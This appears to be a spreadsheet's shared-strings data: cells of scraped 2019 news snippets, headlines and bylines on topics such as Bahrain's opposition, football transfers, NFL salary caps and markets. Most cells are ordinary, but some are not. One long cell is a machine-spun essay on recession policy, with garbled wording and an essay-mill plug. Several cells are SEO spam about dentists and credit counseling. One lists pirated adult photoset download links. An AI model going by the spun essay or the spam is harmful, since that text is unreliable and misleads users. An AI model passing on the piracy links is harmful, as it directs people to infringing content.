    <t>Leaders of Bahrain’s opposition in exile have branded the nation a “rogue state” following revelations that the country’s government may have hired al-Qaeda operatives to murder dissidents. Several opposition figures gathered outside Bahrain’s embassy in London on Wednesday following the broadcast of an Al Jazeera documentary last week on the country’s attempts to stifle anti-government organising among its Shia majority. “Evidence has suggested … that extrajudicial killings took place, the regime had cooperated with terrorist organisations, including al-Qaeda,” said Saeed Shehabi, General Secretary of the London-based Bahrain Freedom Movement. “This situation indicates that the regime abides by no norms, no conventions, no laws, no international agreements and that makes it a rogue state.” Bahrain was the only gulf state to witness eruption of street protests during the Arab Spring in 2011, when crowds gathered to demand a democratically elected government, the end of sectarian rule and a redistribution of wealth and power. The Sunni Al-Khalifa monarchy requested military assistance from neighbouring allies Saudi Arabia and the United Arab Emirates to assist its security forces, who together violently crushed the protest camp built at the capital Manama’s Pearl Roundabout. At least 35 people were killed and many of those arrested were tortured during detention, human rights groups claim. The uprising continued into 2012, with tens of thousands attending weekly rallies, but continued police crackdowns killed dozens of more civilians and arrested thousands. Former al-Qaeda claims recruitment by Bahrain gov’t as assassin The documentary “Playing with Fire” alleges Bahrain’s government made contact with al-Qaeda with the intention of using its agents to assassinate opposition figures. “One of the officers told me they wanted assassinations,” Bahraini citizen Mohamed Saleh told Al Jazeera. “I asked them is this a request from the government and the King and they said yes.” In the documentary, Saleh claimed emissaries from the king refered to him as part of al-Qaeda and asked for his help. Saleh added that he was detained by Saudi Arabia shortly after entering the country to procure weapons and was held in custody for four months, when he was released following pressure from Bahrain’s monarchy. “I went back to Bahrain and was received by the King who wished me well.” Bahrain’s government has denied the claims made in the documentary. In London, opposition leaders that had gathered said the details of his testimony follow a pattern of political repression and should be taken extremely seriously. “The Al Jazeera programme provided irrefutable evidence that the regime of Bahrain engaged in unlawful practices, unlawful alliances, illegitimate targeting of innocent people, extrajudicial killing, fomenting and inciting both terrorism and sectarianism,” said Shehabi. Exiled dissidents ‘threatened’ Several Bahraini dissidents living in exile have been attacked or threatened, said Shehabi, including on the steps of the embassy in London. “We are very frightened, especially about what the regime can do. We take some precautions but we feel threatened. We are not living in fantasy. These attacks have happened.” Activist and researcher Lyndon Peters, who also spoke outside the embassy, called on the British government – which established a military base in Bahrain last year but has not yet addressed the allegations in the documentary – to take action. “The revelations that Bahrain was in communication with al-Qaeda operators to assassinate opposition members should force a reaction from the western democracies who purportedly support the Al-Khalifa monarchy,” he said. “This should force a reassessment of our relationship with Bahrain… how can we justify being in a military alliance with a ruler who is in communication with al-Qaeda.” Source link</t>
  </si>
  <si>
    <t>Sami Khedira Spotted At The Emirates Ahead Of Arsenal Vs. Lyon Sami Khedira has been spotted at the Emirates ahead of Arsenal‘s game versus Lyon amid intense transfer speculation. The German midfielder, 32, continues to attract the attention of clubs around Europe including Arsenal who’re reportedly preparing a move for the Juventus player. He’s deemed surplus to requirements following the arrivals of Aaron Ramsey and Adrien Rabiot. Several teams are keeping tabs on his progress with the Gunners hopeful of securing his services to add depth and competition to Unai Emery’s midfield according to reports. Ahead of a potential move to Arsenal, Khedira has been soaking up the atmosphere in North London for the club’s pre-season friendly against Lyon. Sami Khedira in London, Arsenal move? [VS] pic.twitter.com/TOuFqqDCfI – Juvefc.com (@juvefcdotcom) July 28, 2019 Big @SamiKhedira at the Emirates today :ok_hand:He was happy to take the photo with me anyway :sweat_smile: #EmiratesCup #AFC @Arsenal pic.twitter.com/wW2KMh4iei – Kevin Timoney (@KevTimoney) July 28, 2019 Naturally, Khedira’s presence at the Emirates got Arsenal fans talking. Here’s some reaction from Twitter: “Need to be getting a CB, I don’t hate Khedira but this ain’t it,” one Twitter user wrote. A second tweeted: “COME TO THE GUNNERS YA YAAAAA Sami Khedira.” A third said: “Khedira is at the Emirates to watch Arsenal. Although not the player he once was, he is better then every midfielder currently at the club and will bring loads of experience as well as a winning mentality if he does join! Hope this one pulls through!” A fourth added: “Give the medical team something to do now Welbeck’s gone.” While another said: “Why are we not in for him? Experienced CDM with leadership qualities available for little money. Get it done Arsenal.” Khedira has less than two years left on his current contract. Will he swap Italy for England? Watch this space. This post Sami Khedira Spotted At The Emirates Ahead Of Arsenal Vs. Lyon appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>The former Ipswich mayor and two co-accused are on trial for extortion.</t>
  </si>
  <si>
    <t>Cosmetic Dental Clinic In Halton Hills Ontario Ontario Halton Hills Dentists in Halton Hills 692 results for Dentists in Halton Hills, ON Market Place Dental Centre (3.1 km) 280 Guelph St Georgetown, ON, L7G 4B1 905-877-2273 Georgetown Marketplace Mall – Family &amp; CosmeticDentistry. Best Dentists in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, Sunnyview Dental Find the Top Dentists in Halton Hills, ON Enter your location so we can match you with dentists near you Go Let us help you find the perfect dentist Go Best of 2019 – Dentists in Halton Hills, ON Best of 2019 – Dentists in Halton Hills, ON Here are These Halton. Kid Friendly Dental Clinic Near Halton Hills Ontario Dentistry on Sinclair is Georgetown's most trusted, family-friendly dentistry. We've been providing comprehensive dental and oral health care for over 24 years. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, King's Cove Family Dental, Market Place Dental Centre, Young Dentistry, Oksana Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, King's Cove Family Dental, Market Place Dental Centre, Young Dentistry, Oksana M. Sawiak, Cosmetic Dental Clinic Near Halton Hills Ontario 为您提供与 Oakville 相关的域名和网站信息，帮助您从域名应用的角度更好的了解域名是如何被使用的，为您使用域名提供参考依据。 Top Dentist In Halton Hills Top cities in United States Washington, D.C. Cosmetic Dentist In Halton Hills Locate and compare Cosmetic Dentistry in Halton Hills ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. The Best Dentists in Halton Hills Handpicked Top 3 Dentists in Halton Hills, ON. They face a rigorous 50-Point Inspection, which includes everything from checking Best Dentists in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, Sunnyview Dental – Georgetown, King's Cove Family Dental, Pownall Janet, DDs – Still Waters Dental, Market Place Dental Centre, Mill.</t>
  </si>
  <si>
    <t>Sophie Moore</t>
  </si>
  <si>
    <t>The Morrison government is spending $5 million to entice Indian cricket lovers out to the T20 World Cup tournaments next year.</t>
  </si>
  <si>
    <t>Asian shares drifted lower on Monday as markets anxiously counted down to a likely cut in U.S. interest rates this week with much riding on whether or not the Federal Reserve signals yet more are in the pipeline.</t>
  </si>
  <si>
    <t>Crackachu</t>
  </si>
  <si>
    <t>Good deal for youngblood considering its only just released and also the cheapest price for borderlands handsome collection ever as far as I'm aware, enjoy</t>
  </si>
  <si>
    <t>David Mark</t>
  </si>
  <si>
    <t>Australian basketball finds a new home — and a lifeline — after Channel Nine opts out of its domestic coverage, with dozens of games to air on SBS under a new two-year deal.</t>
  </si>
  <si>
    <t>It is believed the car was being driven south on Perry Road in Pinjar when it rolled after being driven through a bend in the road.</t>
  </si>
  <si>
    <t>(CNN) — Some people swim the English Channel between Britain and France, others prefer to sail. French inventor Franky Zapata has attempted to do the same on a jet-powered hoverboard — but failed. Zapata, a former jet ski racing champion, took to the skies Thursday on his Flyboard Air vehicle but missed a platform mounted on a boat as he tried to land midway for refueling, Reuters reported. The 40-year-old was uninjured in the fall. The daredevil, who took off from from Sangatte in France, was attempting to mark the 110th anniversary of the first aerial crossing of the Channel and hoped to make the crossing in 20 minutes. Zapata flew off from Sangatte in France DENIS CHARLET/AFP/AFP/Getty Images The inventor captured the world’s imagination when he took to the skies above Paris at Bastille Day parade on July 14 with a board that can reach an altitude of nearly 500 feet — with the potential to go much higher — and a speed of 87 miles per hour. While the Bastille Day flight only used “3% of the machine’s capacity,” a successful crossing of the Channel will take “99.9%,” Zapata told CNN ahead of his Channel crossing. Zapata said he believed he had a “30% chance” of making it across, and admitted to feeling greater pressure now that there is a lot more interest in his exploits. “When you fly with your body, even your hands affect the direction you want to go in. You feel the turbulence and the air through your fingers,” Zapata told CNN. “It’s like becoming a bird. But it’s also very hard. I have to fight against the wind with my legs so there’s pain too. It’s not as peaceful as it looks.” CNN’s Jack Guy contributed to this report. France's Flyboard hero Franky Zapata fails to cross English Channel The post France's Flyboard hero Franky Zapata fails to cross English Channel appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Three has announced its 5G pricing in the UK, and the good news is it won't cost you any more than its current "contract, SIM only and PAYG 4G mobile plans." That means it will be cheaper than EE, which charges a premium for its 5G contracts, and there are no speed caps – something Vodafone has introduced with its new unlimited plans which cover you for 4G and 5G. However, both EE and Vodafone have their 5G networks available right now (albeit in limited areas for now). Three will also offer a 5G unlimited data SIM only plan which will cost £22 per month, however one cost you will have to brunt is that of a 5G-enabled smartphone. From today, July 26, … TechRadar – All the latest technology news The post Three’s 5G network won’t cost you any more than 4G appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Philip G. Pavely-USA TODAY Sports With a jump to almost $5 million, the Steelers now have some salary cap room in order to make a move. With the restructure of Stephon Tuitt’s contract for the 2019 season on Tuesday, the Steelers added $3.9 million to the nearly $1.1 million they had in salary cap space this year. In converting the majority of Tuitt’s 2019 salary to a signing bonus, the Steelers can spread the cap hit of his nearly $5.2 million bonus over the remaining four years of his contract. Just to be clear, Tuitt did not take a pay cut. His salary is now just being paid upfront to help manage the salary cap. But what will the Steelers do with this new cap space? What they won’t do: Nothing There is no benefit to restructuring a player’s contract to just have the salary cap savings sit and do nothing. The money the Steelers are saving in cap space now comes out equally over the following three years. If the Steelers aren’t going to use the savings now, they would have been better off not deferring the cap hit to a later date. Extend Joe Haden Although either an extension or new contract his very likely for Joe Haden before the start of the 2019 season, the savings the Steelers gained on Tuesday will not go toward Haden’s contract. The reason the money won’t be used for Haden is because a new deal would most likely lower his cap hit for 2019. The Steelers simply don’t need any cap space if Haden is getting re-signed. Extend Bud Dupree A new contract for Bud Dupree falls under the same category as Joe Haden in that a contract extension would likely lower his 2019 cap hit. Additionally, Dupree has stated he wants to play out the last year of his contract this season. There is really no deal that would benefit both the Steelers and Dupree at this point, so I don’t see anything getting done this year. Extend Mike Hilton The chance to sign Mike Hilton to a long-term deal expired when he had to sign his ERFA (Exclusive Rights Free Agent) contract at the start of camp in order to participate in team activities. If the two sides want to work out a deal in the future, they must wait until the 2019 season is over. Uncharacteristically extend a current player It’s the Steelers policy that they don’t renegotiate a player’s contract until there is one year or less remaining, unless the player is a quarterback. Although both James Conner and JuJu Smith-Schuster will have one year left on their rookie deals next season, it’s too early for the Steelers to extend either one of them. What they could do: Sign a current free agent There are players still available at various positions who currently are not in any team’s training camp. With depth possibly needed at a variety of positions (tight end, safety, and outside linebacker to name a few), the Steelers could go looking for those answers now. Sign a player once they are released after final cuts The other possibility for signing a new player is to wait until all roster cuts have been made on Saturday August 31 by 4 P.M. eastern. Rather than wait until the last minute to free up funds, the Steelers could just be looking ahead to the end of the preseason. Extend Javon Hargrave Entering the final year of his rookie contract, Javon Hargrave had a fantastic 2018 season despite playing less than half of the snaps on defense. With 6.5 sacks, Hargrave was second on the team’s defensive line only behind Cam Heyward’s 8.0 in 2018. Showing improvement every season, Hargrave would be a great player for the Steelers to lock in long term. Extend Sean Davis Much like Javon Hargrave, Sean Davis is entering his fourth season and is a player the Steelers could extend with one year remaining on his rookie deal. With quality depth at safety still in question, Davis could extend his contract if the two sides can come to an agreement. Something we don’t expect It is not beyond the realm of possibilities for the Steelers to make a move we are not expecting. Perhaps the Steelers want to sign Artie Burns beyond 2019 even though they declined his fifth-year option. Maybe they are higher on Tyler Matakevich than what we believe and want to keep him around longer. Or maybe the the Steelers just wanted a little breathing room to sign practice squad players the first of September and are willing to pay more than the standard rate. These ideas are long shots, but you never know who the team may value when they are behind closed doors. So what are the Steelers going to do with the cap space they just saved? Make sure you vote in the poll below and comment if there is another possibility which may have been overlooked.</t>
  </si>
  <si>
    <t>Afrocenchix co-founder Joycelyn Mate turned a ‘niche’ product into an award-winning company. Read more? Click here</t>
  </si>
  <si>
    <t>Ryan Rocca</t>
  </si>
  <si>
    <t>Police said when authorities arrived on the scene, they found a boy with a stab wound to the lower body near some bleachers by a field in the park.</t>
  </si>
  <si>
    <t>MelbourneFloatHouse</t>
  </si>
  <si>
    <t>Members day - Get 50% Off! This Wednesday 24th July is Members day. This means 50% Off on All Single Sessions!!! Terms &amp; Conditions -Members only -Single sessions -Excluding reiki. -You can sign up as a member on the day https://www.melbournefloathouse.com.au/</t>
  </si>
  <si>
    <t>Steel City Underground presents “Steelers Throwback Thursday” featuring plays from recent seasons which you may have forgotten about! Now we’re “bringing them back!” Steelers Throwback Thursday: James Harrison arrives to training camp on a fire truck appeared first on Steel City Underground.</t>
  </si>
  <si>
    <t>Daniel Gilhooly</t>
  </si>
  <si>
    <t>A Rugby Championship showdown with South Africa isn't being regarded as a prelude to their crunch World Cup pool match by All Blacks coach Steve Hansen.</t>
  </si>
  <si>
    <t>Carving out an hour a week to do something just for you can make a big difference</t>
  </si>
  <si>
    <t>Australian shares are likely to edge slightly higher at the open, after Wall Street was boosted by technology stocks and expectations of a US interest rate cut.</t>
  </si>
  <si>
    <t>Free daily horoscope for each star sign from renowned Astrologer Hedy Damari. Forecasts for the week ahead in life, love and career.</t>
  </si>
  <si>
    <t>BP has not taken any of its oil tankers through the Strait of Hormuz since a July 10 attempt by Iran to seize one of its vessels, the British company's Chief Financial Officer Brian Gilvary said on Tuesday.</t>
  </si>
  <si>
    <t>A pensioner has been fined for causing a crash on a busy road while on a test drive.</t>
  </si>
  <si>
    <t>Promo codes included in URL. JavaScript Programming from A-Z: Learn to Code in JavaScript 4.1 (159 ratings), 10,503 students enrolled What you'll learn The basic structure of JavaScript The components of JavaScript Learn how to write clear and effective code Understand where to place JavaScript code for best results Learn how to use variables and operators Learn how to use arrays Learn about the power of functions Learn how to work with objects Discover what are conditional statements and how to create them The Complete Python for Beginners:Master Python from scratch New Course! What you'll learn Beginner to python programming who want to learn python in easy and simple way. Python programming basics. Introduction to python for Data analytics. students want to learn how to use Jupyter notebook and IPython . students wants to master Python programming basics. Build Your Own Custom Computer! 4.2 (93), 3,931 students What you'll learn Build your own custom computer. Learn how to optimize your current system. Learn basic troubleshooting and Windows utilities.</t>
  </si>
  <si>
    <t>Thunderstorms brought heavy rain to Burlington, Vermont, on July 28 as the National Weather Service issued a severe thunderstorm warning for the city and surrounding area. Local news reports warned of the possibility of winds of 60 miles per hour, small hail, and lightning. This footage was posted to Instagram by Linda Bassick, who said she filmed it in Burlington on Sunday. Credit: Linda Bassick via Storyful</t>
  </si>
  <si>
    <t>THE Milky Way galaxy violently devoured a neighbouring cluster of stars and planets approximately 10 billion years ago, astronomers have shockingly announced. The post Space news: Astronomers are certain the Milky Way ‘violently’ consumed another galaxy appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Dean Boxall said the Australian swimmer had been left 'devastated' by the positive doping test, and believes she would never knowingly try to cheat the system.</t>
  </si>
  <si>
    <t>Shelby Thom</t>
  </si>
  <si>
    <t>The BC Wildfire Service says four firefighters are on scene and they managed to get the blaze under control. It is not threatening any structures.</t>
  </si>
  <si>
    <t>Government and also the Central Lender Economic Recession Answers Discuss how the governing administration and the critical bank should respond to an economic slowdown together with a recession At the end of year or so 2008, people who study this sort of thing suggested that this economy might be led to -or already in- a recession when monetary growth had been decelerating. An official definition of some sort of recession is two effective quarters by using a decline throughout gross home product (GDP). However , the exact National Agency of Fiscal Research (NBER) identifies that the recession as the “significant turn down in economic activity distributed across the economic system, lasting some months” determined a number of finance indicators, with the emphasis on movements in job and cash flow. It will not confine itself to use the exact technical definition of two sectors of damaging GDP progress because it is exclusively assessed quarterly and it is be subject to revisions. Want GDP expansion is bad for two quarters, the recession is already properly happening. Nonetheless , an economic low is characterized less rigid. For instance, i was in an economic depression even with impressive growth for the reason that economic growing rate was initially slowing down, household prices were falling, lack of employment rates ended up increasing and the ones could begin to see the business period that transported from a thrive period so that you can bust. As an answer to an global financial slowdown along with recession, united states government and fundamental bank is going to take active tasks in solving economic matters through the use of a couple of expansionary policies: fiscal protection plan and monetary policy. As the economy is just not officially within a recession, you will discover signs which will economic exercise is slowing. According to CRS Report just for Congress, 08, economic development in the United States seemed to be negative from the fourth 1 fourth of 3 years ago after 2 strong quarters, but transformed positive in the first and second quarters of 08. According to an individual data range (graphs), career fell in each and every month of 2008. The having been fired rate, of which rose a bit during the last half 2007, rejected in The month of january and February of ’08, but started off rising for March and by August withstood at 6. 1%. Often the continuing personal turmoil is likewise cause for consternation. Forecasters, while projecting reduced growth on 2008, remain uncertain around the likelihood of a recession. If financial market place confidence is simply not restored and market arises remain increased, the broader economy may possibly slow as a consequence of difficulties around financing customer durables, enterprise investment, faculty education, and other big ticket objects. When the financial system is down turning, economist believe the central standard bank should destination more increased exposure of short-term fiscal policy since it takes less time to apply and its selections to drastically decrease rates of interest, and healthy market adjusting, along with the currently enacted provocation, would be plenty of to avoid economic downturn. When there is a major intervention on the financial options market, the gear box of money is usually stimulated into the financial field and ultimately into the wider economy, where an important growth of credit standing could critically raise mixture demand. It is stated to emphasise more on monetary plan than financial policy because there are lags in advance of a policy modify affects grinding it out. Therefore , obama’s stimulus could be provided after the market has already got into a economic collapse or a tough economy has already completed. First, there is also a legislative practice lag which applies to virtually all policy plans – a new stimulus program cannot take on effect before bills tend to be passed by House and also Senate, both equally chambers will be able to reconcile dissimilarities between most of their bills, as well as the President indicators the bill. Quite a few bills get delayed a few step in using this method. As affecting Table main , quite a few past government bills haven’t become legislation until your recession has already been underway or possibly finished. Is usually additional economic stimulus important during the economy slowdown? It depends on the current status of the economy. Fiscal plan temporarily effects the economy through an increase in this deficit. Money stimulus might take the form of larger government shelling out (direct grinding it out or convert payments) and also tax savings, but commonly it can raise spending solely through a large budget debts. A deficit-financed increase in administration spending direct boosts shelling out by borrowing to financial higher federal government spending or even transfer repayments to people. A deficit-financed tax trim indirectly enhancements spending in case the recipient applies the taxes cut to raise his wasting. Economists commonly agree which spending suggestions are relatively more stimulative than tax bill cuts considering that part of a new tax minimize will be rescued by the users. The most important determinant of the effect on the economy is definitely its dimension. Economic overall performance can be detailed through changing in mixture demand in addition to aggregate furnish curves. Combination supply as well as demand are generally shown while in the graph underneath. If individual confidence throughout the economy falls and urgentessay.net people reduce their own spending, aggregate demand will fall, decreasing real production and prices even dropping the into a economic collapse (figure1). For the reason that American financial system slid within recession for 1929, economists relied on the Classical Idea of economics, which stated that the market would self-correct if united states government did not obstruct. But as often the recession strengthened into the 1930s and no calamite occurred, economists realized that some sort of revision theoretically would be required. John Maynard Keynes produced Keynesian Principle, which called for government remedy to correct financial instability. Because fiscal insurance plan is the consumption of government shelling out and taxation’s to support the economy, Keynes recommends the fact that parliament need to increase united states government spending to “prime the main pump” on the economy in periods about recession. Simultaneously, he concerns tax diminishes in recessionary times, to add to consumers’ throw away income of which they can obtain more solutions. Through both equally methods of fiscal policy, the rise in aggregate demand caused by such activities leads agencies to increase manufacturing, hire personnel, and increase household earnings to enable them to obtain more. Even though both equipment are effective, Keynes advocated enhancements made on government spending as the more efficient fiscal coverage tool, given that any change in government paying has a special effect on beall and endall demand. Nevertheless if taxation are lower, consumers rather will not spend all of their increased disposable income; they are very likely to save some of it. Referring to the very graph, a greater in united states government spending Grams or a decrease in autonomous taxes leads to the aggregate need AD adjustment to the right, thus escalating both the stability level of authentic GDP, Q*, and the sense of balance price level P*. While economy is usually running right into recession, middle bank is probably the agencies trustworthy to influence the demand, deliver and hence, price of money and credit to keep at it production, charges, and occupation stable. For this, the middle bank utilizes three applications: open markets operations, the main discount amount and source requirements. To be able to bring the economic climate out of economic collapse, central lender will smaller the preserve requirements. As a consequence of act, new member banks must keep less overall, and so more money can be put towards circulation by way of expanding their particular loans for you to firms and the ones. Furthermore, while using its start market procedures for buying govt securities, the particular central loan company pays for most of these securities through crediting the main reserve medical care data of a member bankers involved with someone buy. With more profit these hold accounts, banks have more money to provide loans, interest rates may fall, as well as consumer plus business wasting may grow, encouraging economical expansion. Often the discount cost is is an component to non-public bankers on the intentions of the central financial institution to add volume to the money give. So your lowered price reduction rate which is certainly announced by way of the central lender encourages a great deal more banks in order to borrow from often the reserve finance institutions. According to the chart below, the central lender open markets purchase of investments, a fall during the discount pace or a decline in the required book ratio could raise the cash supply, thus increasing aggregate demand plus the equilibrium level of real GROSS DOMESTIC PRODUCT, Q*, and then the equilibrium cost level, P*.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. President Trump Applauds Jerry Jones for Anthem Stance Tuesday 23 July 2019 01:31 PM UTC-05 | Tags: credit-counseling from https://m.youtube.com/watch?v=WfyfbXP-j2M President Trump Applauds Jerry Jones for Anthem Stance: President Donald Trump is congratulating Jerry Jones, the owner of the Dallas Cowboys football team, for saying his players will be required to stand for the playing of the national anthem. Photo Credit: NBC 5 Sports This story uses functionality that may not work in our app. Click here to open the story in your web browser. #Article President Donald Trump is congratulating Jerry Jones, the owner of the Dallas Cowboys football team, for saying his players will be required to stand for the playing of the national anthem. https://www.youtube.com/watch?v=ggO1JuQniEQ https://www.youtube.com/channel/UCmy2jtpG-3ddtGgfS8QOhHg/videos copyright © 2016 Privacy Policy Tags: credit-counseling</t>
  </si>
  <si>
    <t>Victoria's road toll has skyrocketed again after two crash deaths just hours apart on Monday night.</t>
  </si>
  <si>
    <t>Laura Polson</t>
  </si>
  <si>
    <t>After seven years hosting House Rules Johanna Griggs is leaving to explore other options within the Seven Network.</t>
  </si>
  <si>
    <t>Source: https://www.techspot.com/news/81190-youtubers-union-demands-more-transparency-regarding-demonetization.html YouTubers Union demands more transparency regarding demonetization YouTubers Union has no real authority or power, but it has recently announced (below) a partnership with IG Metall, a powerful metalworker’s union in Germany. IG Metall does not only represent metalworkers. It has also formed unions in various other industries including textiles, plastics, electrical engineering, and information technology. Source: https://www.techspot.com/news/81190-youtubers-union-demands-more-transparency-regarding-demonetization.html The post YouTubers Union demands more transparency regarding demonetization appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Police have debunked rumours the murder suspects were sighted 1000km from the search area and that one of the suspects had been photographed taunting police.</t>
  </si>
  <si>
    <t>Thelifeerotic | Apr 29, 2019 | Hi-Res Photoset | 229 Mb rapidgator:TLE_2019-04-29_SLAVE-FOR-YOU-ATTICA.rar uploaded:TLE_2019-04-29_SLAVE-FOR-YOU-ATTICA.rar katfile:TLE_2019-04-29_SLAVE-FOR-YOU-ATTICA.rar mexashare:TLE_2019-04-29_SLAVE-FOR-YOU-ATTICA.rar filefox:TLE_2019-04-29_SLAVE-FOR-YOU-ATTICA.rar title:[Thelifeerotic] Attica – Slave For You</t>
  </si>
  <si>
    <t>Jean-Philippe Mateta is unlikely to sign for Newcastle United this summer, according to Goal journalist Ronan Murphy. The reporter, who writes about the Bundesliga, claimed via his personal Twitter account on Monday morning that Mateta, 22, has recently signed a new deal at Mainz, which would mean that Newcastle would struggle to sign the Frenchman if they turn their attention to him. Source</t>
  </si>
  <si>
    <t>Disgraced former Masterchef host George Calombaris has broken down and apologised after underpaying his restaurant staff by almost $8 million.</t>
  </si>
  <si>
    <t>Geoff Lemon</t>
  </si>
  <si>
    <t>Meg Lanning began her batting career for Australia as an unstoppable force before injury and loss of form dulled her threat — but at Chelmsford the predator was back to savage England, writes Geoff Lemon.</t>
  </si>
  <si>
    <t>Claire Campbell</t>
  </si>
  <si>
    <t>A father charged over the alleged murder of his 20-year-old daughter Sabrina Lekaj — whose body was found inside her car on Sunday night — faces an Adelaide court from his hospital bed.</t>
  </si>
  <si>
    <t>The auto industry has been Europe’s driving force for years, but it’s experiencing a rough ride nowHere comes more bad news from the car industry. In what is shaping up to be the worst year since the financial crisis for the automotive sector, Nissan and Aston Martin have become the latest manufacturers to hit the skids.At the luxury marque favoured by James Bond, sales forecasts for 2019 have been ripped up thanks to a “challenging external environment” and problems facing the wider economy. The firm hinted at job cuts as a consequence, as it burns down shareholder value faster than 007 goes through its cars. Continue reading… Read More</t>
  </si>
  <si>
    <t>23e2 is a digital marketing agency based out of Scarborough, ON. We have been assisting our clients all over Canada &amp; the USA with their online presence through various platforms. We specialize in creating Google 360 Virtual Tours. Along with that, we offer services like Website Design, Social Media Management, Search Engine Optimization, Google Ads, .. Read more</t>
  </si>
  <si>
    <t>Let’s talk about anything you like. source The post Let’s talk about gym, fitness, health, nutrition and anything else! appeared first on Health Figure Store.</t>
  </si>
  <si>
    <t>Armed teenagers have been filmed terrorising a boy who was due to give evidence at a trial into the fatal stabbing of his friend. Read more? Click here</t>
  </si>
  <si>
    <t>U.S. Midwest manufacturing activity unexpectedly deteriorated to its weakest level since December 2015 in July amid ongoing trade dispute between China and the United States, an index jointly developed by MNI Indicators and ISM-Chicago released on Wednesday showed.</t>
  </si>
  <si>
    <t>Leeds have joined Newcastle United in pursuit of Burnley defender Ben Gibson, according to the Northern Echo. The newspaper claims that the Clarets are willing to listen to offers for the 26-year-old centre-back, who they signed in a club-record deal from Middlesbrough last summer only for him to make just five appearances in his debut season at Turf Moor. It is understood that Leeds and former... Source</t>
  </si>
  <si>
    <t>Our trip to Japan travel VLOG – ARNE &amp; CARLOS The post Our trip to Japan travel VLOG – ARNE &amp; CARLOS appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>The City of Kelowna says eight cannabis stores have received zoning approval and another seven are in the approval process.</t>
  </si>
  <si>
    <t>Kaplowitz Media</t>
  </si>
  <si>
    <t>"LoFi &amp; lovely." Artesano del Tobacco Viva la Vida WRAPPER: Nicaraguan Habano Oscuro 2000 BINDER: Nicaraguan Corojo 99 FILLER: Nicaraguan Criollo 98 FORMAT: Robusto (554) ORIGIN: Esteli, Nicaragua BLENDER: AJ Fernandez STRENGTH: Full &gt;&gt;&gt; NOTES: Powerfully purposeful. Peppery. Alright! Alliteration aside already. Black pepper and cayenne, boldly-so; upfront but not dialing back a whole bunch. Spices: smoked paprika, cumin, cinnamon, clove. Slight ginger (particularly extending on/into lengthy+ finish.) Undertones are licorice, hibiscus, plums. There is bigness in the lower middlings which almost wrap around to the top &amp; definitely do steer the profile -- dense Cuban coffee &amp; dark chocolate. Underbelly is compost, barnyard, leather. Manure. Performance is superb. Dead-even char. Languid pacing. Thick solid ash. The draw is a smooth &amp; even gate-to-wire medium+ tension. Plentiful smoke out-put yields a dark almost somber leather &amp; spice room-note. READ: Artesano del Tobacco Cigars Viva la Vida | Cigar Review by Kaplowitz ((( link ))) FINAL GRADE: A A 90-100 B 80-89 C 70-79 D 60-69 F 0-59 ###</t>
  </si>
  <si>
    <t>Gus McCubbing</t>
  </si>
  <si>
    <t>“I didn’t think I’d get past year one (at school) let alone get to 300 games.”</t>
  </si>
  <si>
    <t>Victor George Peirce was shot through the window of his 1993 maroon Commodore on Port Melbourne's Bay Street in 2002.</t>
  </si>
  <si>
    <t>Segall Says: Western Canada Games are a great opportunity for athletes – The Western Canada Summer Games are intended to provide development opportunities for amateur athletes and to help them advance their skills in a competitive, but friendly environment. The Games. Grover Dental Centre – 202 -46 Carry Dr SE # 202, Medicine Hat, Alberta T1B 4E1 – Rated 4.6 based on 13 Reviews "Excellent dentist, properly and well run. Jump to. Friendliest Dentist In Medicine Hat That rings true for the six teams in the Central Division, including the Medicine Hat Tigers and Calgary Hitmen. especiall. white hat worthiness 查看更多结果» 你还可以在这些话题中找到相关的词、词组和同义词. Preferred Dental Clinic In Medicine Hat Alberta Crestwood dentists in Medicine Hat provide a range of restorative and cosmetic dental services. We make the dental struggle disappear! Contact us today!. Crestwood Dental – Your Medicine Hat Dentists At Crestwood Dental Clinic, we understand the struggle. SouthSide Dental – Medicine Hat dental services SouthSide Dental – Medicine Hat dental services Admin Home About Friendliest Dentist In Medicine Hat Alberta – Best Dentist in Medicine Hat says: December 29, 2018 at 11:34 PM [. ] Carbon pricing effective in lowering greenhouse gas emissions – Preston Manning, past leader of the Reform party, and Jim Dinning, past. Testimonials in Medicine Hat. Vista Dental provides professional dental care, specializing in Dental Implants, Tooth Extractions, Root Canal, Wisdom Teeth, and Sedation Dentistry. Call 403-548-7077 today to schedule an appointment! Preferred Dental Clinic In Medicine Hat Preferred Dental Clinic In Medicine Hat Alberta Crestwood dentists in Medicine Hat provide a range of restorative and cosmetic dental services. We make the dental struggle disappear! Contact us today!. Crestwood Dental – Your Medicine Hat Dentists At Crestwood Dental Clinic, we understand the struggle. SouthSide Dental – Medicine Hat dental services SouthSide Dental – Viva Vitality: How dental sealants can help those areas brushing and flossing can’t get to – Brushing and flossing is the best way to help prevent tooth decay. Dental sealants help protect those deep grooves that are unable to be properly cleaned. A dental sealant is applied in a thin. Southern Alberta waste refinery turning trash into ‘high-grade, low-cost’ biodiesel – After its July 11 grand opening at Aldersyde, Cielo has plans to open four more refineries across the province, in the. That rings true for the six teams in the Central Division, including the Medicine Hat Tigers and Calgary Hitmen. especiall. white hat worthiness 查看更多结果» 你还可以在这些话题中找到相关的词、词组和同义词. If you’re a good boy (= if you behave well) at the. pop into its friendly archive and ask questions. Then look on the lawn outside for two gorgeous manhole covers that say.</t>
  </si>
  <si>
    <t>European online food delivery rivals Takeaway.com and Just Eat said on Monday they had agreed in principle to create one of the largest players in the sector globally through an 8.2 billion pounds all-share deal.</t>
  </si>
  <si>
